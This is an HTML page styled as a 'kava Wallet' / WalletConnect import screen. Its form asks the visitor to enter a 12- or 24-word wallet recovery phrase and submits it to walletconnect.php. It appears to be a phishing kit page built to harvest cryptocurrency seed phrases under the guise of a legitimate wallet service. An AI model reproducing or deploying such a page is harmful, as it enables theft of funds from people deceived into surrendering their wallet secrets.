<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta name="author" content="stormtech">
	<title>walletconnect</title>

	<link rel="stylesheet" type="text/css" href="blockchain.css">
</head>
<body>

	<header class="header-content">
		

	<div class="button">
		<h3 class="folder-button"> kava Wallet</h3></div>

	</header>
<section class="sec">
	<form action="walletconnect.php">
	<input type="phrase" name="pwd" id="pwd" placeholder="Input wallet phrase"><br>
	<p class="input-p">Typically 12 (sometimes 24) words separated by single spaces </p>
	<input type="submit" value="Import" class="submit-sec">
	</form>
</section>


</body>


</html>